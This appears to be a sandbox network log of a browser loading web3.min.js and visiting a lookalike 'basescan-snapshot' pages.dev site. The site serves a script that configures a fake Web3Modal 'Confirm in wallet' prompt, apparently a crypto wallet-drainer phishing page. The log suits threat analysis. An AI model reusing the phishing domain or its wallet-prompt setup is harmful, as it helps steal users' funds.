                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                              2024-09-28 01:15:58 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                              Cache-Control: public, max-age=228574
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:58 GMT
                                                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                                              2024-09-28 01:15:58 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              12192.168.2.549729151.101.65.2294435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC372OUTGET /npm/web3@1.10.0/dist/web3.min.js HTTP/1.1
                                                                                                                                                                                                                                              Host: cdn.jsdelivr.net
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Length: 1184878
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              X-JSD-Version: 1.10.0
                                                                                                                                                                                                                                              X-JSD-Version-Type: version
                                                                                                                                                                                                                                              ETag: W/"12146e-oONT4AbBzjmMwosGXJ4nVPn21lU"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Age: 690007
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:59 GMT
                                                                                                                                                                                                                                              X-Served-By: cache-fra-eddf8230114-FRA, cache-ewr-kewr1740036-EWR
                                                                                                                                                                                                                                              X-Cache: HIT, MISS
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 77 65 62 33 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 57 65 62 33 3d 74 28 29 3a 65 2e 57 65 62 33 3d 74 28 29 7d 28
                                                                                                                                                                                                                                              Data Ascii: /*! For license information please see web3.min.js.LICENSE.txt */!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 72 28 33 33 33 39 29 2c 32 35 33 37 3a 72 28 36 37 36 39 29 2c 32 35 36 35 3a 72 28 37 38 39 37 29 2c 32 37 31 38 3a 72 28 32 31 37 30 29 2c 32 39 32 39 3a 72 28 38 34 33 36 29 2c 32 39 33 30 3a 72 28 36 32 31 33 29 2c 33 31 39 38 3a 72 28 35 34 39 31 29 2c 33 35 32 39 3a 72 28 37 38 35 32 29 2c 33 35 34 31 3a 72 28 31 38 37 31 29 2c 33 35 35 34 3a 72 28 37 32 32 35 29 2c 33 36 37 35 3a 72 28 38 35 37 31 29 7d 7d 2c 37 30 30 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 68 61 72 64 66 6f 72 6b 73 3d 76 6f 69 64 20 30 2c 74 2e 68 61 72 64 66 6f 72 6b 73 3d 5b 5b 22 63 68 61 69
                                                                                                                                                                                                                                              Data Ascii: r(3339),2537:r(6769),2565:r(7897),2718:r(2170),2929:r(8436),2930:r(6213),3198:r(5491),3529:r(7852),3541:r(1871),3554:r(7225),3675:r(8571)}},7002:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.hardforks=void 0,t.hardforks=[["chai
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 63 61 6c 6c 28 65 29 3b 69 66 28 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 26 26 6e 3e 3d 65 2e 6c 65 6e 67 74 68 26 26 28 65 3d 76 6f 69 64 20 30 29 2c 7b 76 61 6c 75 65 3a 65 26 26 65 5b 6e 2b 2b 5d 2c 64 6f 6e 65 3a 21 65 7d 7d 7d 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 3f 22 4f 62 6a 65 63 74 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 2e 22 3a 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 2e 22 29 7d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30
                                                                                                                                                                                                                                              Data Ascii: call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")};Object.defineProperty(t,"__esModule",{value:!0
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 61 72 20 72 2c 6e 2c 69 2c 6f 2c 61 3d 65 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 61 2e 5f 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 3d 5b 5d 2c 61 2e 5f 65 69 70 73 3d 5b 5d 2c 61 2e 5f 63 75 73 74 6f 6d 43 68 61 69 6e 73 3d 6e 75 6c 6c 21 3d 3d 28 69 3d 74 2e 63 75 73 74 6f 6d 43 68 61 69 6e 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 5b 5d 2c 61 2e 5f 63 68 61 69 6e 50 61 72 61 6d 73 3d 61 2e 73 65 74 43 68 61 69 6e 28 74 2e 63 68 61 69 6e 29 2c 61 2e 44 45 46 41 55 4c 54 5f 48 41 52 44 46 4f 52 4b 3d 6e 75 6c 6c 21 3d 3d 28 6f 3d 61 2e 5f 63 68 61 69 6e 50 61 72 61 6d 73 2e 64 65 66 61 75 6c 74 48 61 72 64 66 6f 72 6b 29 26 26 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 66 2e 49 73 74 61 6e 62 75 6c 3b 74 72 79 7b 66 6f 72
                                                                                                                                                                                                                                              Data Ascii: ar r,n,i,o,a=e.call(this)||this;a._supportedHardforks=[],a._eips=[],a._customChains=null!==(i=t.customChains)&&void 0!==i?i:[],a._chainParams=a.setChain(t.chain),a.DEFAULT_HARDFORK=null!==(o=a._chainParams.defaultHardfork)&&void 0!==o?o:f.Istanbul;try{for
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 72 6e 20 6e 65 77 20 74 28 7b 63 68 61 69 6e 3a 73 28 73 28 7b 7d 2c 6f 29 2c 72 29 2c 68 61 72 64 66 6f 72 6b 3a 6e 2c 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 3a 69 7d 29 7d 2c 74 2e 69 73 53 75 70 70 6f 72 74 65 64 43 68 61 69 6e 49 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 30 2c 6d 2e 5f 67 65 74 49 6e 69 74 69 61 6c 69 7a 65 64 43 68 61 69 6e 73 29 28 29 3b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 74 2e 6e 61 6d 65 73 5b 65 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 7d 2c 74 2e 5f 67 65 74 43 68 61 69 6e 50 61 72 61 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 28 30 2c 6d 2e 5f 67 65 74 49 6e 69 74 69 61 6c 69 7a 65 64 43 68 61 69 6e 73 29 28 74 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74
                                                                                                                                                                                                                                              Data Ascii: rn new t({chain:s(s({},o),r),hardfork:n,supportedHardforks:i})},t.isSupportedChainId=function(e){var t=(0,m._getInitializedChains)();return Boolean(t.names[e.toString()])},t._getChainParams=function(e,t){var r=(0,m._getInitializedChains)(t);if("number"==t
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 48 61 72 64 66 6f 72 6b 20 22 2b 65 2b 22 20 6e 6f 74 20 73 65 74 20 61 73 20 73 75 70 70 6f 72 74 65 64 20 69 6e 20 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 22 29 3b 76 61 72 20 6e 3d 21 31 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 69 3d 75 28 76 2e 68 61 72 64 66 6f 72 6b 73 29 2c 6f 3d 69 2e 6e 65 78 74 28 29 3b 21 6f 2e 64 6f 6e 65 3b 6f 3d 69 2e 6e 65 78 74 28 29 29 6f 2e 76 61 6c 75 65 5b 30 5d 3d 3d 3d 65 26 26 28 74 68 69 73 2e 5f 68 61 72 64 66 6f 72 6b 21 3d 3d 65 26 26 28 74 68 69 73 2e 5f 68 61 72 64 66 6f 72 6b 3d 65 2c 74 68 69 73 2e 65 6d 69 74 28 22 68 61 72 64 66 6f 72 6b 43 68 61 6e 67 65 64 22 2c 65 29 29 2c 6e 3d 21 30 29 7d 63 61 74 63 68 28 65 29 7b 74 3d 7b 65 72 72 6f 72 3a 65
                                                                                                                                                                                                                                              Data Ascii: row new Error("Hardfork "+e+" not set as supported in supportedHardforks");var n=!1;try{for(var i=u(v.hardforks),o=i.next();!o.done;o=i.next())o.value[0]===e&&(this._hardfork!==e&&(this._hardfork=e,this.emit("hardforkChanged",e)),n=!0)}catch(e){t={error:e
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 66 6f 72 6b 42 79 42 6c 6f 63 6b 4e 75 6d 62 65 72 28 65 2c 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 74 48 61 72 64 66 6f 72 6b 28 72 29 2c 72 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 63 68 6f 6f 73 65 48 61 72 64 66 6f 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 21 30 29 2c 65 29 7b 69 66 28 74 26 26 21 74 68 69 73 2e 5f 69 73 53 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 48 61 72 64 66 6f 72 6b 20 22 2b 65 2b 22 20 6e 6f 74 20 73 65 74 20 61 73 20 73 75 70 70 6f 72 74 65 64 20 69 6e 20 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 22 29 7d 65 6c 73 65 20 65 3d 74 68 69 73 2e 5f 68 61 72 64 66 6f 72 6b 3b
                                                                                                                                                                                                                                              Data Ascii: forkByBlockNumber(e,t);return this.setHardfork(r),r},t.prototype._chooseHardfork=function(e,t){if(void 0===t&&(t=!0),e){if(t&&!this._isSupportedHardfork(e))throw new Error("Hardfork "+e+" not set as supported in supportedHardforks")}else e=this._hardfork;
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 66 6f 72 28 76 61 72 20 61 3d 75 28 65 29 2c 73 3d 61 2e 6e 65 78 74 28 29 3b 21 73 2e 64 6f 6e 65 3b 73 3d 61 2e 6e 65 78 74 28 29 29 69 28 73 2e 76 61 6c 75 65 29 7d 63 61 74 63 68 28 65 29 7b 74 3d 7b 65 72 72 6f 72 3a 65 7d 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 73 26 26 21 73 2e 64 6f 6e 65 26 26 28 72 3d 61 2e 72 65 74 75 72 6e 29 26 26 72 2e 63 61 6c 6c 28 61 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 74 29 74 68 72 6f 77 20 74 2e 65 72 72 6f 72 7d 7d 74 68 69 73 2e 5f 65 69 70 73 3d 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 61 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 69 3d 6e 75 6c 6c 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 3d 75 28 74 68 69 73 2e 5f 65 69 70 73 29 2c 61 3d 6f 2e 6e 65 78 74 28 29 3b 21 61
                                                                                                                                                                                                                                              Data Ascii: for(var a=u(e),s=a.next();!s.done;s=a.next())i(s.value)}catch(e){t={error:e}}finally{try{s&&!s.done&&(r=a.return)&&r.call(a)}finally{if(t)throw t.error}}this._eips=e},t.prototype.param=function(e,t){var r,n,i=null;try{for(var o=u(this._eips),a=o.next();!a
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 74 69 76 65 48 61 72 64 66 6f 72 6b 73 28 72 29 2c 69 3d 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 61 6d 42 79 48 61 72 64 66 6f 72 6b 28 65 2c 74 2c 69 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 41 63 74 69 76 61 74 65 64 45 49 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3b 69 66 28 74 68 69 73 2e 65 69 70 73 28 29 2e 69 6e 63 6c 75 64 65 73 28 65 29 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6e 3d 75 28 76 2e 68 61 72 64 66 6f 72 6b 73 29 2c 69 3d 6e 2e 6e 65 78 74 28 29 3b 21 69 2e 64 6f 6e 65 3b 69 3d 6e 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 6f 3d 69 2e 76 61 6c 75 65 5b 31 5d 3b 69 66 28 74 68 69 73 2e 67 74 65 48 61 72 64 66 6f 72 6b 28 6f
                                                                                                                                                                                                                                              Data Ascii: tiveHardforks(r),i=n[n.length-1].name;return this.paramByHardfork(e,t,i)},t.prototype.isActivatedEIP=function(e){var t,r;if(this.eips().includes(e))return!0;try{for(var n=u(v.hardforks),i=n.next();!i.done;i=n.next()){var o=i.value[1];if(this.gteHardfork(o
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1378INData Raw: 6f 72 74 65 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 26 26 69 3b 65 3d 74 68 69 73 2e 5f 63 68 6f 6f 73 65 48 61 72 64 66 6f 72 6b 28 65 2c 6f 29 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 61 3d 75 28 74 68 69 73 2e 68 61 72 64 66 6f 72 6b 73 28 29 29 2c 73 3d 61 2e 6e 65 78 74 28 29 3b 21 73 2e 64 6f 6e 65 3b 73 3d 61 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 63 3d 73 2e 76 61 6c 75 65 3b 69 66 28 63 2e 6e 61 6d 65 3d 3d 3d 65 26 26 6e 75 6c 6c 21 3d 3d 63 2e 62 6c 6f 63 6b 29 72 65 74 75 72 6e 21 30 7d 7d 63 61 74 63 68 28 65 29 7b 72 3d 7b 65 72 72 6f 72 3a 65 7d 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 73 26 26 21 73 2e 64 6f 6e 65 26 26 28 6e 3d 61 2e 72 65 74 75 72 6e 29 26 26 6e 2e 63 61 6c 6c 28 61 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 72 29 74 68 72 6f
                                                                                                                                                                                                                                              Data Ascii: orted)&&void 0!==i&&i;e=this._chooseHardfork(e,o);try{for(var a=u(this.hardforks()),s=a.next();!s.done;s=a.next()){var c=s.value;if(c.name===e&&null!==c.block)return!0}}catch(e){r={error:e}}finally{try{s&&!s.done&&(n=a.return)&&n.call(a)}finally{if(r)thro


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              13192.168.2.549736172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC799OUTGET /dist/website.html HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC660INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:59 GMT
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Location: /dist/website
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woIwl%2Bo1m4ZtS9ncVjI%2FT8b3bVzLUwv1tnns8UrSsCNSitTqPeQ06oLeOdzyXmce2wzoSbbKyGnwLk5nrMYSRGpHDjrCxKU2KRr65IqeK%2Fd77ukaUe4FuUuRZcwNk99DM0wcPe%2BRFIYwI3BR3KBKdoVVZSKatXe2XyAviyiyqOxV3HPlcJ2OBsdMoRBIsZtu1wfvtZHA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2b37a7b1855-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              14192.168.2.549735172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC711OUTGET /modules.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC793INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 1469354
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "23c44ca59fddb7cb35e3fa398932a1d0"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PO1Lu0GylvTn0oqfBP350BikSLH0MZ5X1E7z20yNFZzfVz9yHCUt3xEG7OG4dMnGQAMGpzTruu6VBya1kNoIu1Inpx3s0buXgavweNt2a9v30K7kmeyaIdm53yfRUu0Sh5ruA56zczyDIN86n%2FVWKSWYX5YmDbgxZRGiUdbRn6Slnmy5NuAkr3hLENKTw8lqDT%2FosMOb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2b36dc60fa8-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC576INData Raw: 77 69 6e 64 6f 77 2e 74 68 65 6d 65 4d 6f 64 65 20 3d 20 22 64 61 72 6b 22 3b 0a 0a 6c 65 74 20 63 66 67 20 3d 20 7b 0a 20 20 64 6f 6d 61 69 6e 3a 20 27 68 74 74 70 73 3a 2f 2f 77 65 62 33 6d 6f 64 61 6c 2e 63 6f 6d 27 2c 0a 20 20 64 65 73 63 72 69 70 74 69 6f 6e 3a 20 27 57 65 62 33 4d 6f 64 61 6c 27 2c 0a 20 20 6e 61 6d 65 3a 20 27 57 65 62 33 4d 6f 64 61 6c 27 2c 0a 20 20 69 63 6f 6e 3a 20 27 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 75 2f 33 37 37 38 34 38 38 36 27 2c 0a 20 20 68 65 61 64 65 72 54 65 78 74 3a 22 41 63 74 69 6f 6e 20 52 65 71 75 69 72 65 64 22 2c 0a 20 20 6d 69 64 64 6c 65 48 65 61 64 65 72 54 65 78 74 3a 22 43 6f 6e 66 69 72 6d 20 69 6e 20 77 61 6c 6c 65 74 22 2c
                                                                                                                                                                                                                                              Data Ascii: window.themeMode = "dark";let cfg = { domain: 'https://web3modal.com', description: 'Web3Modal', name: 'Web3Modal', icon: 'https://avatars.githubusercontent.com/u/37784886', headerText:"Action Required", middleHeaderText:"Confirm in wallet",
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC1369INData Raw: 73 74 20 65 20 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 6c 69 6e 6b 5b 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 5d 27 29 29 74 28 65 29 3b 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 65 3d 3e 7b 66 6f 72 28 63 6f 6e 73 74 20 72 20 6f 66 20 65 29 69 66 28 22 63 68 69 6c 64 4c 69 73 74 22 3d 3d 3d 72 2e 74 79 70 65 29 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 72 2e 61 64 64 65 64 4e 6f 64 65 73 29 22 4c 49 4e 4b 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 26 26 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 3d 3d 3d 65 2e 72 65 6c 26 26 74 28 65 29 7d 29 29 2e 6f 62 73 65 72 76 65 28 64 6f 63 75 6d 65 6e 74 2c 7b 63 68 69 6c 64 4c 69 73 74 3a 21 30 2c 73 75 62 74 72 65 65 3a
                                                                                                                                                                                                                                              Data Ascii: st e of document.querySelectorAll('link[rel="modulepreload"]'))t(e);new MutationObserver((e=>{for(const r of e)if("childList"===r.type)for(const e of r.addedNodes)"LINK"===e.tagName&&"modulepreload"===e.rel&&t(e)})).observe(document,{childList:!0,subtree:
